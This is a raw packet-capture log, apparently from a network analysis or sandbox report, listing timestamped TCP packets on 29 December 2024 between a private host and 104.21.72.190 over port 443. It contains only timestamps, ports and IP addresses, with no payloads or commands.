Dec 29, 2024 09:23:20.500586987 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.500617981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.500633955 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.506416082 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.506434917 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.506469011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.506477118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.506506920 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.506513119 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.511641979 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.511657000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.511730909 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.511738062 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.511782885 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.518023968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.518038034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.518110037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.518117905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.518157005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.523304939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.523325920 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.523364067 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.523370981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.523403883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.523423910 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.598072052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.598086119 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.598156929 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.598166943 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.598280907 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.690517902 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.690540075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.690579891 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.690609932 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.690629005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.690673113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.695817947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.695836067 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.695883989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.695898056 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.695935965 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.701860905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.701883078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.701915026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.701925993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.701950073 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.701967955 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.707755089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.707773924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.707819939 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.707833052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.707861900 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.707880020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.713773012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.713792086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.713826895 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.713836908 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.713867903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.713892937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.719389915 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.719405890 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.719443083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.719451904 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.719490051 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.724657059 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.724677086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.724714041 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.724721909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.724749088 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.724819899 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.799784899 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.799814939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.799860001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.799915075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:20.799942970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:20.799954891 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.349020958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.349033117 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.349071026 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.349107981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.349155903 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.349175930 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.349298000 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.349927902 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.349942923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.350083113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.350086927 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.350097895 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.350181103 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.351042986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.351057053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.351125956 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.351125956 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.351134062 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.351185083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.352066994 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.352081060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.352153063 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.352153063 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.352160931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.352207899 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.352931023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.352945089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.353040934 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.353049040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.353123903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.353872061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.353885889 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.353982925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.353990078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.354063034 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.354825974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.354840994 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.354926109 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.354933023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.355180025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.355746031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.355762005 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.355809927 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.355815887 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.355940104 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.357692003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.357707977 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.357781887 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.357789040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.357891083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.358469963 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.358484983 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.358558893 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.358566046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.358660936 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.359623909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.359637976 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.359726906 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.359734058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.359831095 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.360506058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.360519886 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.360610962 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.360619068 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.360663891 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.361486912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.361500978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.361591101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.361598015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.361673117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.362459898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.362474918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.362565994 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.362572908 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.362646103 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.363331079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.363346100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.363378048 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.363387108 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.363415956 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.363464117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.364397049 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.364409924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.364510059 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.364516973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.364686966 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.365346909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.365365028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.365412951 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.365418911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.365443945 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.365478992 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.366298914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.366312027 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.366396904 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.366404057 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.366468906 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.367258072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.367270947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.367342949 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.367348909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.367403984 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.369764090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.369785070 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.369878054 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.369887114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.370054960 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.375703096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.375722885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.375793934 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.375807047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.375932932 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.470225096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.470244884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.470315933 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.470335007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.472724915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.475521088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.475544930 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.475613117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.475613117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.475624084 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.475711107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.481395006 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.481410027 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.481468916 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.481470108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.481479883 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.481523037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.497736931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.497755051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.497824907 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.497833014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.497886896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.503691912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.503717899 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.503855944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.503866911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.503992081 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.509753942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.509773970 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.509871006 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.509871006 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.509896040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.510106087 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.538538933 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.538563967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.539434910 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.539444923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.541435957 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.543884039 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.543900013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.544003010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.544011116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.544111967 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.549150944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.549170017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.549262047 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.549262047 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.549268961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.549508095 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.555094957 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.555114985 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.555176020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.555183887 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.556022882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.607161045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.607186079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.607261896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.607275009 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.607347012 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.698945999 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.698977947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.699062109 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.699062109 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.699073076 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.699187040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.704210997 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.704229116 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.704307079 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.704313040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.704369068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.709702015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.709719896 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.709795952 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.709804058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.709892988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.739773035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.739800930 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.739917994 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.739917994 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.739926100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.741338015 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.744790077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.744812965 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.745348930 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.745357990 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.745430946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.749478102 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.749511003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.749543905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.749550104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.749604940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.749604940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.754934072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.754954100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.755065918 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.755073071 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.756745100 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.808309078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.808336973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.808463097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.808463097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.808473110 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.808948040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.900445938 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.900470018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.900566101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.900566101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.900582075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.902265072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.905942917 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.905958891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.909358025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.909367085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.910614014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.910645962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.910722017 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.910722017 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.910729885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.915477037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.940979004 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.941006899 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.941059113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.941068888 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.941096067 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.941109896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.945899010 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.945916891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.945971966 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.945979118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.946882963 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.950630903 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.950648069 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.950709105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.950716972 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.951528072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.956161022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.956188917 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.956245899 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:21.956254959 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:21.957360983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:22.009615898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:22.009665012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:22.009704113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:22.009718895 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:22.009746075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:22.009762049 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:22.101774931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:22.101799965 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:22.101860046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:22.101874113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:22.101952076 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:22.107275963 CET	443	49709	104.21.72.190	192.168.2.5
